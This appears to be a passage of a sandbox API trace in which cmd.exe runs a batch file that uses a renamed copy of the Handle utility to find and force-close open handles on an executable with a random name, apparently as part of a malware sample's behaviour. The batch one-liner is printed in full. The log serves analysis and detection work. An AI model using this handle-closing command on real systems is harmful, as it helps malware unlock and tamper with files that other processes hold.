[0292.273] GetFileType (hFile=0x3c) returned 0x2 [0292.273] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.273] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f2a8 | out: lpMode=0x19f2a8) returned 1 [0292.887] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.887] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f2c0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2c0*=0x2) returned 1 [0293.075] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0293.075] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0293.075] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0293.075] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0293.075] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0293.075] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0293.075] GetConsoleTitleW (in: lpConsoleTitle=0x19ee40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0293.215] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0293.215] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0293.215] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0293.215] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0293.215] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0293.215] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0293.215] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.215] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.215] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x19ebf8, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x19ebf0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x19ebf0*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0293.216] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0293.216] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19e99c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0293.216] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0x19e99c, lpFilePart=0x19e994 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0x19e994*=0x0) returned 0x1e [0293.216] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0293.216] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19e718 | out: lpFindFileData=0x19e718) returned 0x510b68 [0293.216] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0293.216] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x19e718 | out: lpFindFileData=0x19e718) returned 0x510b68 [0293.216] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0293.216] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0293.216] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x19e718 | out: lpFindFileData=0x19e718) returned 0x510b68 [0293.216] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0293.216] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0293.216] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0293.216] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0293.216] GetEnvironmentStringsW () returned 0x51cd40* [0293.217] FreeEnvironmentStringsA (penv="=") returned 1 [0293.217] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0293.217] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.217] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0293.374] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.375] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0293.623] _get_osfhandle (_FileHandle=0) returned 0x38 [0293.623] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0294.084] SetConsoleInputExeNameW () returned 0x1 [0294.084] GetConsoleOutputCP () returned 0x1b5 [0294.620] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0294.620] SetThreadUILanguage (LangId=0x0) returned 0x409 [0295.254] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f28c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0295.254] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0295.254] _get_osfhandle (_FileHandle=3) returned 0xb0 [0295.254] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0295.258] _get_osfhandle (_FileHandle=3) returned 0xb0 [0295.258] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0295.258] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x19f25c*=0x94, lpOverlapped=0x0) returned 1 [0295.259] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=148, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0295.259] _get_osfhandle (_FileHandle=3) returned 0xb0 [0295.259] GetFileType (hFile=0xb0) returned 0x1 [0295.259] _get_osfhandle (_FileHandle=3) returned 0xb0 [0295.259] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0295.267] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="\"expenditurevincenttablet.exe\"") returned 0x1e [0295.267] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0295.267] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0295.267] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0295.267] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0295.267] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0295.267] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0295.267] _wcsicmp (_String1="/L", _String2="%I") returned 10 [0295.267] _wcsicmp (_String1="/D", _String2="%I") returned 10 [0295.267] _wcsicmp (_String1="/F", _String2="%I") returned 10 [0295.267] _wcsicmp (_String1="/R", _String2="%I") returned 10 [0295.268] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0295.268] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0295.268] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0295.268] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0295.268] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0295.268] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0295.268] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0295.268] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0295.270] _tell (_FileHandle=3) returned 226 [0295.270] _close (_FileHandle=3) returned 0 [0295.270] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f020 | out: _Buffer="\r\n") returned 2 [0295.270] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.270] GetFileType (hFile=0x3c) returned 0x2 [0295.270] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0295.270] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19eff8 | out: lpMode=0x19eff8) returned 1 [0295.956] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.956] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f010, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f010*=0x2) returned 1 [0296.071] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0296.071] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.071] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x19f01c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0296.071] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x19f01c | out: _Buffer=">") returned 1 [0296.071] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.071] GetFileType (hFile=0x3c) returned 0x2 [0296.071] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.071] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19effc | out: lpMode=0x19effc) returned 1 [0296.196] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.196] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x19f014, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x19f014*=0x1e) returned 1 [0296.259] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x19f2bc | out: _Buffer="FOR") returned 3 [0296.259] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.259] GetFileType (hFile=0x3c) returned 0x2 [0296.259] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.259] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f294 | out: lpMode=0x19f294) returned 1 [0296.283] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.283] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x19f2ac, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2ac*=0x3) returned 1 [0296.287] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x19f2bc | out: _Buffer=" /F") returned 3 [0296.287] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.287] GetFileType (hFile=0x3c) returned 0x2 [0296.287] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.287] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f294 | out: lpMode=0x19f294) returned 1 [0296.293] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.293] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x19f2ac, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2ac*=0x3) returned 1 [0296.296] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x19f2bc | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0296.296] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.296] GetFileType (hFile=0x3c) returned 0x2 [0296.296] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.296] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f294 | out: lpMode=0x19f294) returned 1 [0296.300] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.300] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x19f2ac, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2ac*=0x20) returned 1 [0296.302] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x19f2bc | out: _Buffer=" %I IN ") returned 7 [0296.302] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.302] GetFileType (hFile=0x3c) returned 0x2 [0296.302] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.302] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f294 | out: lpMode=0x19f294) returned 1 [0296.312] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.312] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x19f2ac, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2ac*=0x7) returned 1 [0296.314] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x19f2b8 | out: _Buffer="(`vIDhS3md.exe -accepteula \"expenditurevincenttablet.exe\" -nobanner`) DO ") returned 73 [0296.314] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.314] GetFileType (hFile=0x3c) returned 0x2 [0296.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.314] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f290 | out: lpMode=0x19f290) returned 1 [0296.320] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.320] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x19f2a8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2a8*=0x49) returned 1 [0296.322] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.322] GetFileType (hFile=0x3c) returned 0x2 [0296.322] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.322] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f29c | out: lpMode=0x19f29c) returned 1 [0296.324] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.324] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x19f2b4, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0x19f2b4*=0x1) returned 1 [0296.326] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.326] GetFileType (hFile=0x3c) returned 0x2 [0296.326] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.326] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f28c | out: lpMode=0x19f28c) returned 1 [0296.330] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.330] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x510b70*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x19f2a4, lpReserved=0x0 | out: lpBuffer=0x510b70*, lpNumberOfCharsWritten=0x19f2a4*=0xc) returned 1 [0296.331] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x19f2ac | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0296.331] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.331] GetFileType (hFile=0x3c) returned 0x2 [0296.331] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.331] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f284 | out: lpMode=0x19f284) returned 1 [0296.333] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.333] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x19f29c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f29c*=0x26) returned 1 [0296.334] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x19f2bc | out: _Buffer=") ") returned 2 [0296.334] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.334] GetFileType (hFile=0x3c) returned 0x2 [0296.334] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.334] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f294 | out: lpMode=0x19f294) returned 1 [0296.336] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.336] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f2ac, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2ac*=0x2) returned 1 [0296.337] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f2d0 | out: _Buffer="\r\n") returned 2 [0296.337] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.337] GetFileType (hFile=0x3c) returned 0x2 [0296.337] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.337] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f2a8 | out: lpMode=0x19f2a8) returned 1 [0296.342] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.342] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f2c0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2c0*=0x2) returned 1 [0296.343] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0296.343] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0296.343] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0296.343] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0296.343] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0296.343] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0296.343] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0296.343] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x19f1f8, _Radix=0 | out: _EndPtr=0x19f1f8*=",6 delims=: \"") returned 3 [0296.343] wcstol (in: _String="6 delims=: \"", _EndPtr=0x19f1f8, _Radix=0 | out: _EndPtr=0x19f1f8*=" delims=: \"") returned 6 [0296.343] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0296.343] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0296.343] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0296.343] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0296.343] _wpopen (_Command="vIDhS3md.exe -accepteula \"expenditurevincenttablet.exe\" -nobanner", _Mode="rb") returned 0x77981268 [0296.352] feof (_File=0x77981268) returned 0 [0296.352] ferror (_File=0x77981268) returned 0 [0296.352] fgets (in: _Buf=0x51ebc0, _MaxCount=256, _File=0x77981268 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77981268) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0299.100] feof (_File=0x77981268) returned 0 [0299.100] ferror (_File=0x77981268) returned 0 [0299.100] fgets (in: _Buf=0x51ec06, _MaxCount=442, _File=0x77981268 | out: _Buf="\r\r\n", _File=0x77981268) returned="\r\r\n" [0299.100] feof (_File=0x77981268) returned 0 [0299.100] ferror (_File=0x77981268) returned 0 [0299.100] fgets (in: _Buf=0x51d599, _MaxCount=695, _File=0x77981268 | out: _Buf="", _File=0x77981268) returned 0x0 [0299.977] _pclose (in: _File=0x77981268 | out: _File=0x77981268) returned 1 [0299.978] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x51d599, cbMultiByte=73, lpWideCharStr=0x51d550, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0299.978] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19eed8 | out: _Buffer="\r\n") returned 2 [0299.978] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.978] GetFileType (hFile=0x3c) returned 0x2 [0299.978] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.978] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19eeb0 | out: lpMode=0x19eeb0) returned 1 [0300.023] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.023] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19eec8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19eec8*=0x2) returned 1 [0300.023] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0300.023] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x19eed4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0300.023] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x19eed4 | out: _Buffer=">") returned 1 [0300.023] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.023] GetFileType (hFile=0x3c) returned 0x2 [0300.023] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.023] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19eeb4 | out: lpMode=0x19eeb4) returned 1 [0300.024] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.024] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x19eecc, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x19eecc*=0x1e) returned 1 [0300.024] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.024] GetFileType (hFile=0x3c) returned 0x2 [0300.024] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.024] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f154 | out: lpMode=0x19f154) returned 1 [0300.024] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.024] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x19f16c, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0x19f16c*=0x1) returned 1 [0300.024] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.025] GetFileType (hFile=0x3c) returned 0x2 [0300.025] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.025] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f144 | out: lpMode=0x19f144) returned 1 [0300.025] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.025] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x528608*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x19f15c, lpReserved=0x0 | out: lpBuffer=0x528608*, lpNumberOfCharsWritten=0x19f15c*=0xc) returned 1 [0300.025] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x19f164 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0300.025] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.025] GetFileType (hFile=0x3c) returned 0x2 [0300.025] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.025] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f13c | out: lpMode=0x19f13c) returned 1 [0300.025] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.025] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x19f154, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f154*=0x2c) returned 1 [0300.026] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x19f174 | out: _Buffer=") ") returned 2 [0300.026] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.026] GetFileType (hFile=0x3c) returned 0x2 [0300.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.026] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f14c | out: lpMode=0x19f14c) returned 1 [0300.026] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.026] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f164, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f164*=0x2) returned 1 [0300.026] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f188 | out: _Buffer="\r\n") returned 2 [0300.026] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.026] GetFileType (hFile=0x3c) returned 0x2 [0300.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.026] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f160 | out: lpMode=0x19f160) returned 1 [0300.026] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.026] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f178, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f178*=0x2) returned 1 [0300.027] GetConsoleTitleW (in: lpConsoleTitle=0x19eca0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0300.027] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0300.027] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") 